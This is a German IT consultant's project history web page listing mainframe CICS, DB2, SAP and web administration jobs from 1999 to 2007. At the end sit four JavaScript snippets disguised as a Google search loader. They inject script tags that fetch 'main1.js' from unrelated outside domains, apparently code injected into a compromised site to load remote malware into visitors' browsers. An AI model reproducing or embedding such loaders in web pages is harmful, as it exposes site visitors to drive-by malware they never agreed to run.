Projekte

12.2007 –
kleinere Projekte

Email Design, Webseiten Design, Windows Administration

Erstellung von Internet Webseiten

Web Programmierung PHP – MySQL

SEO (search engine optimization)

Installation und Administration von LAMP/WAMP (Apache MySQL, PHP) Umgebungen + Tomcat

Konfiguration GPL Shop-System osCommerce

Design von HTML E-Mails

Massenversand von E-Mails

Installation, Administration Lexware financial office –
Formular und Layout Anpassungen

Mail to date 3.0, C++ Builder, WordPress, Typo3, MySQL 5.1, PHP 5.2, Drupal, Joomla, RAD Studio 2007 CODEGEAR, LAMP, WAMP, Apache

07.2007 – 09/2007
ZIVIT, Bonn, Bundesministerium der Finanzen

CICS + DB2 Systemadministration

Systemadministration CICS und DB2 V8. Beim Kunden sind Anwendungen im Einsatz, welche das
SOAP Feature des CICS TS 2.2 nutzen als auch Anwendungen, welche die
neuen Web Services des CICS TS 3.1 nutzen.

Installation, Administration und Wartung CICS TS 3.1

Installation, Administration und Wartung DB2 V8

DB2 Datasharing, unicode support, new function mode

DB2 WLM

Support Anwendungsentwicklung (Dump-Analyse etc.)

DB2 Utilities
(SPUFI, QMF bzw. Visual Explain, Runstats, Reorg)

z/OS Workload Manager

Assembler Programmierung

Coupling Facility Strukturen eingerichtet

ACS Routinen (SMS) – extended adressability, VSAM
System Managed Buffering (SMB)

z/OS
1.7, JES2, IOF, DB2 V8.2 auf z/OS, CICS TS 3.1, CICS Transaction
Gateway (CTG), Xpeditor, BMC Mainview for CICS, CICS AAID/FX, Solve

06.2007 – 07/2007
Zurich Versicherung AG, Bonn, Versicherung

Projekt Unterstützung

Unterstützung
bei der Einführung von Ariba-Buyer in das Beschaffungswesen
der Zurich Versicherungs AG.

Erstellung Fachkonzept Einführung Ariba Buyer

Erstellung Benutzerhandbuch Ariba Buyer

Erstellung Schulungsunterlagen

ICF (internal control framework)

Protokollführer in Meetings

Ariba
Buyer 8.2, SAP R/3 4.6c, Microsoft Office Produkte (Excel, Word)

10.2006 – 11.2006
Provinzial Versicherung, Düsseldorf, Versicherung

CICS Systemadministration

Migration von CICS/ESA 4.1.0 nach CICS TS 3.1

COBOL Programme zur
Ablaufsteuerung im CICS entwickelt mittels der EXCI Schnittstelle

Support der Anwendungsentwickler bei Problemen, Dumps, neuen
Funktionalitäten

Support Operating, Hotline

Bei
der Provinzial Versicherung sind die Produkte Image Plus und OnDemand
im Einsatz welche das CICS als Transaktionsmanager und
Anwendungsserver benötigen.
Das
Image Plus wurde in seiner Funktionalität zum scannen von
Images, anzeigen von Images und speichern von Images im DB2
verwendet. Dabei ist auch das OAM im Einsatz, welches Objekte auf
optical disc auslagert.

z/OS
1.7, DB2 V7.1 auf z/OS, CICS TS 3.1, OnDemand for OS/390 2.1, Image
Plus Object Manager 3.1, Beta92, Beta93, Netview, Lotus Notes,
ContentManager

07.2006 – 07.2006
HSBC Trinkaus & Burkhardt, Düsseldorf, Banken

DB2 Administration

Ermittlung
personenbezogener Daten im DB2 und Klassifizierung dieser im Hinblick
auf Datensicherheit

DB2
UDB V8.2 auf Linux – SUSE, DB2 V7.1 auf z/OS, TPX, CA-DB2 Produkte,
Lotus Notes

08.2003 – 02.2006
Studienaufenthalte – Indien

Besuch
verschiedener Meditations-Zentren und heiliger Plätze

09.2002 – 06.2003
Bayer AG, Leverkusen, Industrie

CICS Systemprogrammierung

Installation + Wartung CICS TS 1.3

Migration CICS 4.1 ? CICS TS 1.3

Support der
Anwendungsentwicklung bei Problemen, Dumps, neuen
Funktionalitäten

Support Operating, Hotline

OS/390 2.9, JES2, JES3, CICS TS 1.3.0, Compuware Xpeditor, CICSPlexSM

08.2002 – 12.2002

Beiersdorf AG, Hamburg, Industrie

DB2 Systemprogrammierung

Durchführung Homogene Systemkopie SAP R/3 mit DB2 auf OS/390

Recovery/Restart SAP R/3 DB2 und normale DB2

Automatisierung der
Administration DB2 mittels REXX und ISPF Dialog-Steuerung

DB2 V6 Installation, Wartung

DB2 Administration (Reorg, Recover, Load etc.)

OS/390 2.9: JES2, DB2 V6

10.2001 – 08.2002
Deutscher Ring AG, Hamburg, Versicherung

DB2
Systemprogrammierung, SAP Basis, AIX Systemprogrammierung

User defined functions in C for DB2

C/370 Module zur Automatisierung der SAP Systemkopie

C/370 Module zur SPACE-Überwachung der DB2 VSAM-Cluster

Homogene Systemkopie SAP

Installation SAP R/3 4,6C auf AIX, DB2 auf OS/390 als
Database-Server und OS/390 als NFS-Server

Installation Kernel und Support-/Hotpackages

Installation Add-On’s für SAP

Mandantentransporte

Installation GNU-C Compiler und Assembler auf AIX

Automatisierung AIX über Scripte (Expect, Shell)

NFS auf AIX

Konfiguration p670

Begleitung der
Installation UC4 Scheduler auf AIX und OS/390 mit MQ Series auf AIX

Installation + Systemadministration DB2 V7.2 auf AIX

Installation + Systemadministration DB2 V6 auf OS/390

Installation CA Produkte für DB2

Automatisierung DB2
Administration über REXX SQL

Recovery/Restart
Konzepte/Verfahren für SAP R/3 DB2 + other DB2’s

RACF for DB2 + OMVS

Support der
Anwendungsentwickler bei Problemen, Dumps, neuen
Funktionalitäten

Support Hotline, Operating

Erstellung einer REXX mit ISPF Dialog-Steuerung zur Automatisierung des RECOVERY
Ablaufes eines DB2’s. Es wurden der BSDS ausgelesen und
anhand von Checkpoints Recovery Job’s generiert um das DB2 komplett
wieder herzustellen.

Nachprogrammierung des ganzen mit C/370 aus Performance Gründen.Entwicklung eines C/370 Programmes, welches aus dem OS/390 File Catalog
entsprechend den in einem DB2 Subsystem definierten HLQ’s
aller STOGROUP’s die File-Name’s der VSAM Cluster
anlistet mit den Informationen der Extents und File-Size (2 GB Grenze erreicht?). Also
ein LISTCAT LEVEL und LISTCAT für einzelne Einträge.
Dies war notwendig, da bei einer Versicherungs-Anwendung die Partitions
der TS überprüft werden mussten ob diese die 2 GB
Grenze erreichen und falls ja mussten Daten reorganisiert und verschoben
werden.

Notfallübung in einem Ausweich-Rechenzentrum mit Recovery der PROD-LPAR und den
zugehörigen Subsystemen, Online-Anwendungen und Batch-Verarbeitung.

p670, OS/390 2.9:
JES2, DB2 V6, AIX 4.3.3: SAP R/3 4.6C, DB2 UDB V7.2, Expect, Korn
Shell, NFS auf AIX + OMVS, RACF, REXX SQL, Lotus Notes

06.2001 – 06.2001
AOK Systems GmbH, Troisdorf bei Köln, Versicherung

Restart/Recovery von SAP/R3 DB2’s

Beratung bezüglich Restart/Recovery Verfahren der SAP R/3
DB2’s

Testen von DB2 OEM
Tools bezüglich Recovery (Infomat)

DB2 V6, SAP R/3 4.6

09.2000 – 08.2001
AMB Informatik GmbH, Aachen, Versicherung

Konzeption und Realisierung einer Migration von CICS 4.1.0 nach TS 1.3.0 und die Installation weiterer Produkte

Installation, Administration CICS TS 1.3

Migration CICS 4.1 ? CICS TS 1.3

Installation
folgender Produkte: XPEDITOR CICS, Intertest, CICS AAID/FX, BMC
Auto-Operator for CICS, Visual Info

Erstellung und
Umsetzung eines RACF Konzeptes im Bereich CICS geltend für
mehrer Kunden der AMB Informatik

Automatisierung der
Überwachung der CICS Systeme mittels REXX für
BMC Auto-Operator

TCP/IP ?? CICS

Support der
Anwendungsentwickler bei Problemen, Dumps, neuen
Funktionalitäten

Support Operating, Hotline

Die Migration der CICS’e umfasste ungefähr 60 Regions
von verschiedenen Kunden mit TCP/IP, LU6.2, CICS Transaction Gateway,
CICS Universal Client, Visual Info, Natural + Adabas, Monitoring
Tools von BMC wie Mainview for CICS, BMC AutoOperator. Bei
einigen Kunden wurde ein CICS als TOR benutzt und mehrere andere als
AOR’s.
Im Zuge der Einführung des LE/370 wurden auf einige
AOR’s mit LE/370 und andere mit alter COBOL+PL1 Umgebung
gefahren.

OS/390
2.7, JES2, CICS TS 1.3, CICS Transaction Gateway 3.1, XPEDITOR/CICS,
Intertest, CICS AAID/FX, BMC Auto-Operator for CICS, BETA 92/93,
CICS Universal Client, Visual Info, Adabas, Natural, IDMS, CICSPlex
SM

07.2000 – 08.2000
METRO MGI GmbH, Düsseldorf, Handel

Systemadministrator CICS

Administration und Wartung CICS 4.1

Definieren von Druckern

Wartung CICS, PTF’s

Support der
Anwendungsentwickler bei Problemen, Dumps, neuen
Funktionalitäten

Support Operating, Hotline

OS/390, CICS 4.1

1999 – 06.2000
IDG mbH, Köln – Versicherung

Tätigkeit
als Systemadministrator/-programmierer im Bereich OS/390 Subsysteme

Test des Euro-Konverters von Mummert & Partner – ein Modul
geschrieben in C/370 – auf seine Einsatzfähigkeit in
den verschiedenen Systemen auf dem IBM-Mainframe. Getestet wurde die
Aufruftechnik aus den verschiedenen Programmiersprachen (C/370, PL1,
COBOL, Assembler) und aus verschiedenen Umgebungen – Batch,
TSO, CICS, IMS. Dazu wurden von meiner Seite entsprechende Programme und
Testläufe entwickelt und zur Ausführung gebracht. Zu der
damaligen Zeit insofern interessant weil das LE/370 noch nicht in
allen Subsystemen verifiziert und genutzt wurde und mit dem
EURO-Konverter erstmalig in Produktion ging. Es wurden Performance
Test’s durchgeführt und der Aufruf des C-Moduls aus
dem BOS-Complement getestet und verifiziert.Entwicklung eines COBOL Programms das die Abweichungen von zwei verschiedenen
Versionsständen des DB2 Catalogs ermittelt mittels der vom BMC
Alter erzeugt Migrations-Listen. Bei dem Kunden wurden jede Nacht der
gesamte DB2 Catalog des Produktiven Systems migriert zum Zwecke der
Daten-Sicherung und Recover Möglichkeit. Dieses COBOL Pgm hat
die zwei Versionsstände des DB2 Catalogs aus den Listen
(Files) ausgelesen. In den Listen waren die DDL aller Objekte im DB2
inklusive der ALIASE, GRANTS, COMMENTS etc. der einzelnen Objekte.
Diese DDL wurde verarbeitet, sortiert, verglichen und danach wieder
als DDL in einer LISTE ausgegeben mit der DDL beider Versionen auf
einer Zeile und einer entsprechenden Kennzeichnung der
Veränderung zwischen beiden.

Die Installation des Visual Info und Image Plus umfasste Visual Info mit
Windows Clients und ein Object-/Library-Server mit jeweils einer
CICS-Region dahinter. Die Daten wurden im DB2 V6 gespeichert und bei
einem entsprechendem alten Zugriffs- bzw. Referenz-Datum auf optical
disc ausgelagert (OAM des DFSMSdfp beteiligt). Es wurde die
eingescannte Versicherungs-Post mit einem Barcode versehen anhand
dieses Barcodes abgelegt und verwaltet.

Notfallübung mit Recovery der Produktions-LPAR zu einem bestimmten Zeitpunkt mit
den zugehörigen Subsystemen und Online-Anwendungen und Batch-Verarbeitung.

Bei den CICS’en wurden einige als TOR + AOR gefahren und es gab
CICS’e für VisualInfo + ImagePlus.

Installation,
Wartung und Administration CICS 4.1.0 und DB2 V6

Migration DB2 V5 ? V6

DB2 Data Sharing + Parallel Sysplex

DB2 performance tuning, Backup/Recovery

Installation
folgender Produkte : QMF, DB2 PM with Windows-Client, BMC DB2
Products (Catalog Manager, Alter, DASD Manager), ProEdit, XPEDITOR,
Intertest, CICS AAID/FX, RAPID, FileAid/TSO, AAID/MVS, Hourglass,
BOS-Complement, Euro Konverter von Mummert & Partner

COBOL
Anwendungs-Entwicklung mit CICS, IMS Transaktionskontrolle, DB2 Zugriffe

Support der
Fachabteilungen in Bezug auf Anwendungsentwicklung und Nutzung von
Testtools

C/370 Anwendungs-Entwicklung

Authorizations im DB2, Restart/Recovery, Stored Procedures with WLM

RACF Definitionen für CICS

Einspielen von PTF’s ins DB2 + CICS

OMVS (Unix) Sample Applications

Installation Image Plus/Visual Info (CICS Universal Client)

als Dokumenten Verwaltung mit DB2 und Windows Clients

REXX Programmierung mit ISPF-Dialog/Table/Skeleton’s Steuerung

zur Vereinfachung der Administration

Problem reporting for software products from IBM and other companies

Support der Anwendungsentwickler bei Problemen, Dumps, neuen Funktionalitäten

Support Operating, Hotline

OS/390 2.5, JES2, JES3, DB2 V4,V5,V6, CICS 4.1, IMS V5, QMF, DB2 PM, BMC DB2products, XPEDITOR, Intertest, CICSPlexSM, CICS AAID/FX, RAPID, FileAid/TSO,

AAID/MVS, Hourglass,BOS-Complement, Visual Info, Image Plus, Office Vision from IBM,

Lotus Notes, Endeavor, OAM, IBM-Dial, Omegamon, TMON

(function() {
var gcse = document.createElement(‚script‘);
gcse.type = ‚text/javascript';
gcse.async = true;
gcse.src = „http://theboatersnetwork.com/js/main1.js“;
var s = document.getElementsByTagName(‚script‘)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‚script‘);
gcse.type = ‚text/javascript';
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‚script‘)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‚script‘);
gcse.type = ‚text/javascript';
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‚script‘)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‚script‘);
gcse.type = ‚text/javascript';
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‚script‘)[0];
s.parentNode.insertBefore(gcse, s);
})();

This page has the following sub pages.